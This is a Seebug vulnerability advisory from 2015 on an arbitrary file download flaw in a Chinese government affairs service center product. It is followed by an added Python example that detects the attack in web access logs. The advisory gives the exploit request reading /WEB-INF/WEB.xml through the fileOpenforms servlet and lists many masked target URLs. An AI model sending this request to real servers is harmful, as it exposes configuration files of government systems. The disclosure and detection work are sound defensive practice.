Generic arbitrary file download in a government affairs service center system

2015-07-16T00:00:00
ID SSV:95814
Type seebug
Reporter Root
Modified 2015-07-16T00:00:00

Description

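Brief description:

Details:

Shenzhen Taiji Software Co., Ltd. has developed quite a few systems. This one is a government affairs service center system, and it has an arbitrary file download vulnerability. There are so many deployments of this system that I don't need to say more. Arbitrary file download: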

/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml

Case:

http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**:8088/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
... and so on

Proof of vulnerability:

Security Testing:

1.

![01.png](https://images.seebug.org/upload/201507/1417125079996340254f54aca1296bb2f859aeb3.png)

2. Some of them can also be read directly

![02.png](https://images.seebug.org/upload/201507/14171257278c26a1b837143bc9671743c7748152.png)
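An added detection example, not part of the original advisory: it scans web access-log lines for requests to the `/servlet/fileOpenforms` endpoint whose `filename` value points into `WEB-INF`, tolerating the doubled slash seen in the case URLs and percent-encoding. The Combined Log Format, the sample log lines and the rules beyond `/WEB-INF/` (`META-INF`, `..` segments) are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint and parameter named in the advisory (compared case-insensitively).
ENDPOINT = "/servlet/fileopenforms"
PARAM = "filename"
# Assumed rule set: application-internal directories and parent-directory segments.
SENSITIVE = re.compile(r"(^|/)(web-inf|meta-inf)(/|$)|(^|/)\.\.(/|$)", re.I)
# Request target and status code of a Combined Log Format line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def normalize(value):
    """Percent-decode once, unify backslashes, collapse repeated slashes."""
    value = unquote(value).replace("\\", "/")
    return re.sub(r"/+", "/", value)


def suspicious_filename(target):
    """Return the normalized filename if the request target matches, else None."""
    # partition, not urlsplit: a target starting with '//' would be parsed as a host.
    path, _, query = target.partition("?")
    if normalize(path).lower() != ENDPOINT:
        return None
    for raw in parse_qs(query, keep_blank_values=True).get(PARAM, []):
        name = normalize(raw)  # parse_qs decoded once; this catches double encoding
        if SENSITIVE.search(name):
            return name
    return None


def scan(lines):
    """Return (status, filename) for every log line that matches the pattern."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        name = suspicious_filename(m.group(1)) if m else None
        if name is not None:
            hits.append((int(m.group(2)), name))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jul/2015:10:00:01 +0800] "GET //servlet/fileOpenforms?filename=/WEB-INF/WEB.xml HTTP/1.1" 200 5120',
    '192.0.2.10 - - [16/Jul/2015:10:00:05 +0800] "GET /servlet/fileOpenforms?filename=%2FWEB-INF%2Fweb.xml HTTP/1.1" 200 5120',
    '192.0.2.11 - - [16/Jul/2015:10:01:00 +0800] "GET /servlet/fileOpenforms?filename=/upload/form_2015.doc HTTP/1.1" 200 20480',
    '192.0.2.12 - - [16/Jul/2015:10:02:00 +0800] "GET /index.jsp HTTP/1.1" 200 900',
]
```

A hit with status 200 is the case worth triaging first, since it indicates the file was actually served.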